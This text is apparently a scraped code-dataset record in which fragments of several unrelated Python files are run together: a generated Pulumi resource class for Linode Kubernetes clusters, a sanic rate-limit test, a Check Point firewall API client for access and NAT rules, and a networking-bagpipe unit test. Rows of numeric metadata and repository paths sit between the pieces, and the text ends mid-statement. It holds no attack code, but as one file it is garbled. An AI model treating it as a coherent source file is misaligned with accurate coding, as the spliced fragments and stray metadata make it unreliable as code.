@k8s_version.setter
def k8s_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "k8s_version", value)
@property
@pulumi.getter
def kubeconfig(self) -> Optional[pulumi.Input[str]]:
"""
The base64 encoded kubeconfig for the Kubernetes cluster.
"""
return pulumi.get(self, "kubeconfig")
@kubeconfig.setter
def kubeconfig(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kubeconfig", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
This Kubernetes cluster's unique label.
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]]:
"""
Additional nested attributes:
"""
return pulumi.get(self, "pools")
@pools.setter
def pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]]):
pulumi.set(self, "pools", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
This Kubernetes cluster's location.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the node. (`ready`, `not_ready`)
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class LkeCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
k8s_version: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an LKE cluster.
## Example Usage
```python
import pulumi
import pulumi_linode as linode
my_cluster = linode.LkeCluster("my-cluster",
k8s_version="1.20",
label="my-cluster",
pools=[linode.LkeClusterPoolArgs(
count=3,
type="g6-standard-2",
)],
region="us-central",
tags=["prod"])
```
## Import
LKE Clusters can be imported using the `id`, e.g.
```sh
$ pulumi import linode:index/lkeCluster:LkeCluster my_cluster 12345
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
:param pulumi.Input[str] label: This Kubernetes cluster's unique label.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]] pools: Additional nested attributes:
:param pulumi.Input[str] region: This Kubernetes cluster's location.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LkeClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an LKE cluster.
## Example Usage
```python
import pulumi
import pulumi_linode as linode
my_cluster = linode.LkeCluster("my-cluster",
k8s_version="1.20",
label="my-cluster",
pools=[linode.LkeClusterPoolArgs(
count=3,
type="g6-standard-2",
)],
region="us-central",
tags=["prod"])
```
## Import
LKE Clusters can be imported using the `id`, e.g.
```sh
$ pulumi import linode:index/lkeCluster:LkeCluster my_cluster 12345
```
:param str resource_name: The name of the resource.
:param LkeClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LkeClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
k8s_version: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LkeClusterArgs.__new__(LkeClusterArgs)
if k8s_version is None and not opts.urn:
raise TypeError("Missing required property 'k8s_version'")
__props__.__dict__["k8s_version"] = k8s_version
if label is None and not opts.urn:
raise TypeError("Missing required property 'label'")
__props__.__dict__["label"] = label
if pools is None and not opts.urn:
raise TypeError("Missing required property 'pools'")
__props__.__dict__["pools"] = pools
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["tags"] = tags
__props__.__dict__["api_endpoints"] = None
__props__.__dict__["kubeconfig"] = None
__props__.__dict__["status"] = None
super(LkeCluster, __self__).__init__(
'linode:index/lkeCluster:LkeCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
k8s_version: Optional[pulumi.Input[str]] = None,
kubeconfig: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]]] = None,
region: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'LkeCluster':
"""
Get an existing LkeCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] api_endpoints: The endpoints for the Kubernetes API server.
:param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
:param pulumi.Input[str] kubeconfig: The base64 encoded kubeconfig for the Kubernetes cluster.
:param pulumi.Input[str] label: This Kubernetes cluster's unique label.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['LkeClusterPoolArgs']]]] pools: Additional nested attributes:
:param pulumi.Input[str] region: This Kubernetes cluster's location.
:param pulumi.Input[str] status: The status of the node. (`ready`, `not_ready`)
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LkeClusterState.__new__(_LkeClusterState)
__props__.__dict__["api_endpoints"] = api_endpoints
__props__.__dict__["k8s_version"] = k8s_version
__props__.__dict__["kubeconfig"] = kubeconfig
__props__.__dict__["label"] = label
__props__.__dict__["pools"] = pools
__props__.__dict__["region"] = region
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
return LkeCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiEndpoints")
def api_endpoints(self) -> pulumi.Output[Sequence[str]]:
"""
The endpoints for the Kubernetes API server.
"""
return pulumi.get(self, "api_endpoints")
@property
@pulumi.getter(name="k8sVersion")
def k8s_version(self) -> pulumi.Output[str]:
"""
The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
"""
return pulumi.get(self, "k8s_version")
@property
@pulumi.getter
def kubeconfig(self) -> pulumi.Output[str]:
"""
The base64 encoded kubeconfig for the Kubernetes cluster.
"""
return pulumi.get(self, "kubeconfig")
@property
@pulumi.getter
def label(self) -> pulumi.Output[str]:
"""
This Kubernetes cluster's unique label.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def pools(self) -> pulumi.Output[Sequence['outputs.LkeClusterPool']]:
"""
Additional nested attributes:
"""
return pulumi.get(self, "pools")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
This Kubernetes cluster's location.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of the node. (`ready`, `not_ready`)
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
| 40.630252
| 207
| 0.628232
| 2,210
| 19,340
| 5.322624
| 0.085973
| 0.111281
| 0.085692
| 0.06801
| 0.816118
| 0.787469
| 0.740117
| 0.715804
| 0.700247
| 0.673213
| 0
| 0.006209
| 0.258842
| 19,340
| 475
| 208
| 40.715789
| 0.814427
| 0.325129
| 0
| 0.586873
| 1
| 0
| 0.088909
| 0.004719
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158301
| false
| 0.003861
| 0.027027
| 0
| 0.281853
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49446ab7902628873f8b341719a41aef07b6240e
| 82
|
py
|
Python
|
src/chapter22/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter22/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter22/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter22/chapter22note.py
# python3 src/chapter22/chapter22note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a226e692f4796cf06d0711714a17ac88f3cc6e
| 933
|
py
|
Python
|
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple.py
|
dmarkey/sanic-aiopylimit
|
d5c4e9b5b5a74cc73ba7b3449d3a3396ba9a04a8
|
[
"Apache-2.0"
] | null | null | null |
from time import sleep
from sample_app.simple import app
def test_throttling_simple_app():
request, response = app.test_client.get('/write')
assert response.status == 200
request, response = app.test_client.get('/write')
assert response.status == 400
request, response = app.test_client.get('/simpleview')
assert response.status == 200
request, response = app.test_client.get('/simpleview')
assert response.status == 429
request, response = app.test_client.get('/write2')
assert response.status == 200
request, response = app.test_client.get('/write2')
assert response.status == 429
for x in range(0, 4):
request, response = app.test_client.get('/')
assert response.status == 200
request, response = app.test_client.get('/')
assert response.status == 429
sleep(10)
request, response = app.test_client.get('/')
assert response.status == 200
| 32.172414
| 58
| 0.679528
| 119
| 933
| 5.218487
| 0.243697
| 0.217391
| 0.26087
| 0.318841
| 0.830918
| 0.830918
| 0.830918
| 0.830918
| 0.830918
| 0.798712
| 0
| 0.043883
| 0.193998
| 933
| 28
| 59
| 33.321429
| 0.781915
| 0
| 0
| 0.73913
| 0
| 0
| 0.05478
| 0
| 0
| 0
| 0
| 0
| 0.391304
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b8db345b249adf4cab41c0a63c175b446d875acf
| 148
|
py
|
Python
|
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
text/_cascade/_form/variable.py
|
jedhsu/text
|
8525b602d304ac571a629104c48703443244545c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Callable
from .property import Property
# [TODO] inherits from property?
class Variable(Property):
pass
var_: Callable
| 11.384615
| 32
| 0.75
| 18
| 148
| 6.111111
| 0.611111
| 0.218182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 148
| 12
| 33
| 12.333333
| 0.916667
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
77097af46ab0dd7a4568c1a9a537612943f71787
| 17,461
|
py
|
Python
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 16
|
2016-12-07T02:45:31.000Z
|
2022-01-20T11:46:24.000Z
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 2
|
2017-07-20T21:12:27.000Z
|
2021-09-09T14:57:01.000Z
|
cpauto/objects/access.py
|
krnnrt/cpauto
|
6076ee0e3f55769aac5b2480453d82f99371a31f
|
[
"Apache-2.0"
] | 5
|
2017-07-28T14:06:25.000Z
|
2021-09-06T12:01:18.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 Dana James Traversie and Check Point Software Technologies, Ltd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# cpauto.objects.access
# ~~~~~~~~~~~~~~~~~~~~~
"""This module contains the classes needed to manage access control and NAT objects."""
from ._common import _CommonClient
class AccessRule:
"""Manage access rules."""
def __init__(self, core_client):
self.__cc = core_client
self.__common_client = _CommonClient(core_client)
def add(self, layer="", position="", params={}):
"""Adds an access rule within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-rule
:param layer: Layer that the rule belongs to identified by name or UID.
:param position: Position in the rulebase. Can be specified in various ways.
:type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._add_with_layer('add-access-rule', layer, position, params)
def show(self, layer='', name='', uid='', params={}):
"""Shows details of an access rule within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-rule
:param layer: Layer that the rule belongs to identified by name or UID.
:param name: (optional) The name of an existing access rule.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('show-access-rule', layer, name, uid, params)
def set(self, layer='', name='', uid='', params={}):
"""Sets new values for an access rule within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-rule
:param layer: Layer that the rule belongs to identified by name or UID.
:param name: (optional) The name of an existing access rule.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('set-access-rule', layer, name, uid, params)
def delete(self, layer='', name='', uid='', params={}):
"""Deletes an existing access rule within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-rule
:param layer: Layer that the rule belongs to identified by name or UID.
:param name: (optional) The name of an existing access rule.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('delete-access-rule', layer, name, uid, params)
def show_all(self, name='', params={}):
"""Shows all access rules within a layer, section, etc.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-rulebase
:param name: The name of an existing access layer, section, etc.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
payload = { 'name': name }
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post('show-access-rulebase', payload=payload)
class AccessSection:
"""Manage access sections."""
def __init__(self, core_client):
self.__cc = core_client
self.__common_client = _CommonClient(core_client)
def add(self, layer="", position="", params={}):
"""Adds an access section within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-section
:param layer: Layer that the section belongs to identified by name or UID.
:param position: Position in the rulebase. Can be specified in various ways.
:type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._add_with_layer('add-access-section', layer, position, params)
def show(self, layer='', name='', uid='', params={}):
"""Shows details of an access section within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-section
:param layer: Layer that the section belongs to identified by name or UID.
:param name: (optional) The name of an existing access section.
:param uid: (optional) The unique identifier of an existing access section.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('show-access-section', layer, name, uid, params)
def set(self, layer='', name='', uid='', params={}):
"""Sets new values for an access section within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-section
:param layer: Layer that the section belongs to identified by name or UID.
:param name: (optional) The name of an existing access section.
:param uid: (optional) The unique identifier of an existing access section.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('set-access-section', layer, name, uid, params)
def delete(self, layer='', name='', uid='', params={}):
"""Deletes an existing access section within a layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-section
:param layer: Layer that the section belongs to identified by name or UID.
:param name: (optional) The name of an existing access section.
:param uid: (optional) The unique identifier of an existing access section.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
return self.__common_client._post_with_layer('delete-access-section', layer, name, uid, params)
class AccessLayer:
"""Manage access layers."""
def __init__(self, core_client):
self.__cc = core_client
self.__common_client = _CommonClient(core_client)
def add(self, name="", params={}):
"""Adds an access layer.
https://sc1.checkpoint.com/documents/R80/APIs/#web/add-access-layer
:param name: A name for the new access layer..
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
payload = { 'name': name }
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post('add-access-layer', payload=payload)
def show(self, name='', uid='', details_level=''):
"""Shows details of an access layer with the specified name
or uid.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-layer
:param name: (optional) The name of an existing host.
:param uid: (optional) The unique identifier of an existing access layer.
:param details_level: (optional) The level of detail to show. Default
value is 'standard' and the other options are: 'uid' or 'full'
:rtype: CoreClientResult
"""
return self.__common_client._show('show-access-layer', name=name, uid=uid, details_level=details_level)
def set(self, name='', uid='', params={}):
"""Sets new values for an existing access layer with the specified
name or uid.
https://sc1.checkpoint.com/documents/R80/APIs/#web/set-access-layer
:param name: (optional) The name of an existing access layer.
:param uid: (optional) The unique identifier of an existing access layer.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__common_client._set('set-access-layer', name=name, uid=uid, params=params)
def delete(self, name='', uid='', params={}):
"""Deletes an existing access layer with the specified
name or uid.
https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-access-layer
:param name: (optional) The name of an existing access layer.
:param uid: (optional) The unique identifier of an existing access layer.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
return self.__common_client._delete('delete-access-layer', name=name, uid=uid, params=params)
def show_all(self, limit=50, offset=0, order=[], details_level=''):
"""Shows all hosts with some reasonable limitations.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-access-layers
:param limit: (optional) Limit the total number of access layers shown.
The default value is 50 and allowed values are in the range 1 to 500.
:param offset: (optional) Skip a number of access layers in the results
before they are shown. Default value is 0.
:param order: (optional) Sort the results by the specified field. The
default is a random order.
:param details_level: (optional) The level of detail to show. Default
value is 'standard' and the other options are: 'uid' or 'full'
:rtype: CoreClientResult
"""
return self.__common_client._show_all('show-access-layers', limit=limit,
offset=offset, order=order, details_level=details_level)
class NATRule:
"""Manage NAT rules."""
def __init__(self, core_client):
self.__cc = core_client
def __post(self, endpoint, package="", uid="", params={}):
payload = { 'package': package }
if uid:
payload['uid'] = uid
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post(endpoint, payload=payload)
def add(self, package="", position="", params={}):
"""Adds a NAT rule.
https://sc1.checkpoint.com/documents/R80/APIs/#web/add-nat-rule
:param package: Package that the rule belongs to identified by name.
:param position: Position in the rulebase. Can be specified in various ways.
:type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
payload = { 'package': package, 'position': position }
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post('add-nat-rule', payload=payload)
def show(self, package="", uid="", params={}):
"""Shows details of a NAT rule within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-rule
:param package: Package that the rule belongs to identified by name.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('show-nat-rule', package, uid, params)
def set(self, package="", uid="", params={}):
"""Sets new values for a NAT rule within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/set-nat-rule
:param package: Package that the rule belongs to identified by name.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('set-nat-rule', package, uid, params)
def delete(self, package="", uid="", params={}):
"""Deletes a NAT rule within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-nat-rule
:param package: Package that the rule belongs to identified by name.
:param uid: (optional) The unique identifier of an existing access rule.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('delete-nat-rule', package, uid, params)
def show_all(self, package="", params={}):
"""Show all NAT rules within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-rulebase
:param package: The name of an existing package.
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
payload = { 'package': package }
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post('show-nat-rulebase', payload=payload)
class NATSection:
"""Manage NAT sections."""
def __init__(self, core_client):
self.__cc = core_client
def __post(self, endpoint, package="", name="", uid="", params={}):
payload = { 'package': package }
if name:
payload['name'] = name
if uid:
payload['uid'] = uid
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post(endpoint, payload=payload)
def add(self, package="", position="", params={}):
"""Adds a NAT section.
https://sc1.checkpoint.com/documents/R80/APIs/#web/add-nat-section
:param package: Package that the section belongs to identified by name.
:param position: Position in the rulebase. Can be specified in various ways.
:type position: integer, string or dict (e.g. 1, 'top', 'bottom', or "{ 'above': 'Section One' }")
:param params: (optional) A dictionary of additional, supported parameter name$
:rtype: CoreClientResult
"""
payload = { 'package': package, 'position': position }
if params:
payload = self.__cc.merge_payloads(payload, params)
return self.__cc.http_post('add-nat-section', payload=payload)
def show(self, package='', name='', uid='', params={}):
"""Shows details of a NAT section within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/show-nat-section
:param package: Package that the section belongs to identified by name.
:param name: (optional) The name of an existing NAT section.
:param uid: (optional) The unique identifier of an existing NAT section.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('show-nat-section', package, name, uid, params)
def set(self, package='', name='', uid='', params={}):
"""Sets new values for a NAT section within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/set-nat-section
:param package: Package that the section belongs to identified by name.
:param name: (optional) The name of an existing NAT section.
:param uid: (optional) The unique identifier of an existing NAT section.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('set-nat-section', package, name, uid, params)
def delete(self, package='', name='', uid='', params={}):
"""Deletes a NAT section within a package.
https://sc1.checkpoint.com/documents/R80/APIs/#web/delete-nat-section
:param package: Package that the section belongs to identified by name.
:param name: (optional) The name of an existing NAT section.
:param uid: (optional) The unique identifier of an existing NAT section.
:param params: (optional) A dictionary of additional, supported parameter names and values.
:rtype: CoreClientResult
"""
return self.__post('delete-nat-section', package, name, uid, params)
| 45.353247
| 111
| 0.658668
| 2,224
| 17,461
| 5.085432
| 0.090378
| 0.029178
| 0.030769
| 0.042706
| 0.860212
| 0.850752
| 0.818921
| 0.800619
| 0.793634
| 0.786561
| 0
| 0.006844
| 0.230113
| 17,461
| 384
| 112
| 45.471354
| 0.834486
| 0.600137
| 0
| 0.515464
| 0
| 0
| 0.080837
| 0.003789
| 0
| 0
| 0
| 0
| 0
| 1
| 0.309278
| false
| 0
| 0.010309
| 0
| 0.628866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
7730ae110282d00e41fe0c7e37329bcf2135dfde
| 11,750
|
py
|
Python
|
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
networking_bagpipe/tests/unit/agent/bagpipe_bgp_agent/test_service_bagpipe_l2.py
|
mail2nsrajesh/networking-bagpipe
|
e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 Orange.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from networking_bagpipe.agent import bagpipe_bgp_agent as agent
from networking_bagpipe.tests.unit.agent.bagpipe_bgp_agent import base
class TestServiceBaGPipeL2Mixin(object):
def test_bagpipe_l2_attach_single_port(self):
dummy_port10 = base.DummyPort(base.NETWORK1, base.PORT10,
evpn=base.BAGPIPE_L2_RT1).__dict__
with mock.patch.object(self.agent,
'_send_attach_local_port') as send_attach_fn:
expected_calls = [
self._mock_send_expected_call(agent.EVPN,
dummy_port10,
self.DUMMY_VIF10)
]
self.agent.bagpipe_port_attach(None, dummy_port10)
send_attach_fn.assert_has_calls(expected_calls)
self._check_network_info(base.NETWORK1['id'],
1,
agent.BAGPIPE_L2_SERVICE,
agent.EVPN,
